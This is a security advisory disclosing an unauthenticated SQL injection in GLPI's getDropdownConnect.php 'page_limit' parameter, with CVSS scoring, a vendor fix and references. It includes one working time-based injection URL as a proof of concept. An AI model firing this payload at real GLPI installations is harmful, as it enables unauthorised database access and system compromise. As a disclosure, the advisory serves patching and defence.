 Vulnerability Type: SQL Injection [CWE-89]
 Risk Level: High 
 CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
 Solution Status: Fixed by Vendor
 Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
 ------------------------------------------------------------------------
 -----------------------
 Advisory Details:
 High-Tech Bridge Security Research Lab discovered a high-risk SQL injection vulnerability in a popular Information Resource Manager (IRM) system GLPI. IRM systems are usually used for management and audit of software packages, providing ITIL-compliant service desk. The vulnerability allows remote non-authenticated attacker to execute arbitrary SQL queries, read and write data to the application's database and completely compromise the vulnerable system.
 The vulnerability exists due to insufficient filtration of user-supplied data passed via the "page_limit" HTTP GET parameter to "/ajax/getDropdownConnect.php" PHP script. A remote unauthenticated attacker can alter present SQL query, inject and execute arbitrary SQL command in application's database.
 Below is a simple SQL Injection exploit, which uses time-based exploitation technique. The page will load time will be significantly higher if MySQL version is 5.X or superior:
 http://[host]/ajax/getDropdownConnect.php?fromtype=Computer&itemtype=Com
 puter&page=1&page_limit=1%20PROCEDURE%20analyse%28%28select%20extractval
 ue%28rand%28%29,concat%280x3a,%28IF%28MID%28version%28%29,1,1%29%20LIKE%
 205,%20BENCHMARK%285000000,SHA1%281%29%29,1%29%29%29%29%29,1%29
 ------------------------------------------------------------------------
 -----------------------
 Solution:
 Update to GLPI 0.90.3
 More Information:
 http://www.glpi-project.org/spip.php?page=annonce&id_breve=358&lang=en
 https://github.com/glpi-project/glpi/issues/581
 ------------------------------------------------------------------------
 -----------------------
 References:
 [1] High-Tech Bridge Advisory HTB23301 - https://www.htbridge.com/advisory/HTB23301 - SQL Injection in GLPI.
 [2] GLPI - http://www.glpi-project.org - GLPI is the Information Resource Manager with an additional Administration Interface.
 [3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
 [4] ImmuniWebÂ® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
 [5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
 ------------------------------------------------------------------------
 -----------------------
 Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.